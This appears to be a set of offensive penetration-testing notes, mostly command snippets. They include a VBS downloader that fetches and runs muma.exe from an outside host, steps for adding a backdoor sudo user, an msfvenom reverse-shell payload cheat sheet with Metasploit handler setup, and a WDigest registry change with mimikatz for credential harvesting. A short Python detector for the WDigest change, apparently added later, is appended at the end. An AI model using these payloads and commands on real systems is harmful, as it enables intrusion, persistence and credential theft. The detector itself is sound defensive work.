https://github.com/Sab0tag3d/SIET Cisco router Smart Install exploitation
https://github.com/cisco-config-analysis-tool/ccat Cisco configuration file analysis
https://github.com/n1nj4sec/pupy Python penetration testing toolkit
https://github.com/RUB-NDS/PRET Printer exploitation

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.jbzj.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

Persistence

Add a user, set the password non-interactively, and add the user to the sudo group
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
Move the home directory: sudo usermod -d /path/to/new/home -m username

File download

tar -cvf log.tar log2012.log  # archive only, no compression!
tar -zcvf log.tar.gz log2012.log  # archive, then compress with gzip
tar -jcvf log.tar.bz2 log2012.log  # archive, then compress with bzip2

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST["AAA"])){
    echo "ISSET";
}else{
    echo "UNSET";
}

A form has to be constructed here
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

Alternatively, modify the request directly in Burp, but it must carry Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler: 'msfconsole -L -r '

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
Use the 32-bit or 64-bit program that matches the operating system.
privilege::debug
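
Detection side of the WDigest registry change above, as an added example that is not part of the original notes: setting UseLogonCredential to a non-zero value makes WDigest keep logon credentials in LSASS memory, so a `reg add` that does this is worth alerting on. The function names and the process-creation records below are constructed for illustration.

```python
import re

# WDigest provider key, tolerant of hive spelling, case and quoting.
KEY_RE = re.compile(
    r"(HKLM|HKEY_LOCAL_MACHINE)\\SYSTEM\\CurrentControlSet\\Control"
    r"\\SecurityProviders\\WDigest(?=[\"\s]|$)", re.IGNORECASE)
REG_ADD_RE = re.compile(r"\breg(\.exe)?\"?\s+add\b", re.IGNORECASE)
VALUE_RE = re.compile(r"\s/v\s+\"?UseLogonCredential\"?", re.IGNORECASE)
DATA_RE = re.compile(r"\s/d\s+\"?(0x[0-9a-f]+|\d+)\"?", re.IGNORECASE)


def enables_wdigest_caching(cmdline):
    """True if cmdline is a `reg add` setting UseLogonCredential to non-zero."""
    if not REG_ADD_RE.search(cmdline):
        return False          # reg query / reg delete are not the change itself
    if not (KEY_RE.search(cmdline) and VALUE_RE.search(cmdline)):
        return False
    data = DATA_RE.search(cmdline)
    if data is None:
        return False          # no /d given: nothing is being enabled
    raw = data.group(1).lower()
    number = int(raw, 16) if raw.startswith("0x") else int(raw)
    return number != 0        # /d 0 is the hardened setting, not an alert


def flag_events(events):
    """Return the hosts whose command line enables WDigest credential caching."""
    return [host for host, cmdline in events if enables_wdigest_caching(cmdline)]


# Constructed process-creation records: (host, command line).
KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LONG_KEY = KEY.replace("HKLM", "HKEY_LOCAL_MACHINE")
SAMPLE_EVENTS = [
    ("WS01", f"reg add {KEY} /v UseLogonCredential /t REG_DWORD /d 1"),
    ("WS02", rf'"C:\Windows\System32\reg.exe" ADD "{LONG_KEY}" '
             "/v UseLogonCredential /t REG_DWORD /d 0x1 /f"),
    ("WS03", f"reg add {KEY} /v UseLogonCredential /t REG_DWORD /d 0 /f"),
    ("WS04", f"reg query {KEY} /v UseLogonCredential"),
]

if __name__ == "__main__":
    for host in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {host}: WDigest UseLogonCredential enabled via reg add")
```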